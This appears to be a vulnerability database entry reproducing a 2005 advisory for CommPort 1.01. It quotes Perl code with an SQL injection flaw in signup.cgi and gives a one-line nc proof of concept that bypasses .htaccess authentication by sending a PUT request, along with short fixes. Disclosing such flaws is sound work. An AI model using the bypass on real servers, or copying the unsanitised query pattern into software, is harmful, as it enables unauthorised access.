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vendor:
CommPort
by:
Jean Pascal Pereira
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CommPort
Affected Version From: 1.01
Affected Version To: 1.01
Patch Exists: NO
Related CWE: N/A
CPE: a:tc:commport:1.01
Metasploit: N/A
Other Scripts: N/A
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Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

CommPort 1.01 <= SQL Injection Vulnerability

The application is prone to a SQL injection vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'signup.cgi' script. A remote attacker can exploit this vulnerability to inject arbitrary SQL commands and gain access to the application.

Mitigation:

Do some input validation.
Source

Exploit-DB raw data:

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CommPort 1.01 <= SQL Injection Vulnerability
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Discovered by: Jean Pascal Pereira <pereira@secbiz.de>

Vendor information:

"A 'Community Portal' generator that can be tailored for any location.
Each user gets a personal portal page to which they can add their own
'channels' or select from a growing list of pre-prepared local, national
and international content. This allows any individual to always have a page
of their own personal favourites in front of them. Channels may be either
'active' with continually updated content such as weather or news headlines
or 'passive' with collections of links."

Vendor URI: http://www.tc.ca/commport/

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Risk-level: High

The application is prone to a SQL injection vulnerability.

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signup.cgi, line 43:

$Method = $ENV{'REQUEST_METHOD'};
$PathInfo = $ENV{'PATH_INFO'};

$Query = new CGI;

if ($Method eq "POST") {
   $UN = $Query->param("UN");
   $PW1 = $Query->param("PW1");
   $PW2 = $Query->param("PW2");
   $EMail = $Query->param("EMail");
   $FName = $Query->param("FName");
   $LName = $Query->param("LName");
   $Addr = $Query->param("Addr");
   $City = $Query->param("City");
   $Prov = $Query->param("Prov");
   $PCode = $Query->param("PCode");
   $Country = $Query->param("Country");


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signup.cgi, line 226:

   $cmd = "insert into User (un,pw,email,fname,lname,address,community,prov,postal,country,Joined) values "
."(\"${UN}\",\"${PWC}\",\"${EMail}\",\"${FName}\",\"${LName}\",\"${Addr}\",\"${City}\",\"${Prov}\",\"${PCode}\",\"${Country}\",now())";

   $sth = $dbh->do($cmd) || &DumpError($sth->errstr);

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Solution:

Do some input validation.

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CommPort 1.01 <= Authentication Bypass Vulnerability
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Discovered by: Jean Pascal Pereira <pereira@secbiz.de>

Vendor information:

"A 'Community Portal' generator that can be tailored for any location.
Each user gets a personal portal page to which they can add their own
'channels' or select from a growing list of pre-prepared local, national
and international content. This allows any individual to always have a page
of their own personal favourites in front of them. Channels may be either
'active' with continually updated content such as weather or news headlines
or 'passive' with collections of links."

Vendor URI: http://www.tc.ca/commport/

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Risk-level: Medium/High

The application is prone to an authentication bypass vulnerability.

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/htdocs/cp/.htaccess:

AuthName "Community Portal"
AuthType Basic
AuthUserFile /home/piwcommport/auth/.commport

<limit GET POST>
require valid-user
</limit>

ErrorDocument 401 /signup.cgi

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/htdocs/cp/admin/.htaccess:

AuthName "Community Portal"
AuthType Basic
AuthUserFile /home/piwcommport/auth/.commport

<limit GET POST>
require valid-user
</limit>

ErrorDocument 401 /signup.cgi

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The application protects specific areas by using base authentication.

Since the authentication is limited to GET and POST, it can be bypassed
by using different or random request types.

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Exploit / Proof Of Concept:

$ perl -e 'print "PUT /cp/admin/ HTTP/1.0\n\n"' | nc [TARGET] 80

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Solution:

Remove the LIMIT directive from any htaccess file stored in the project directory.

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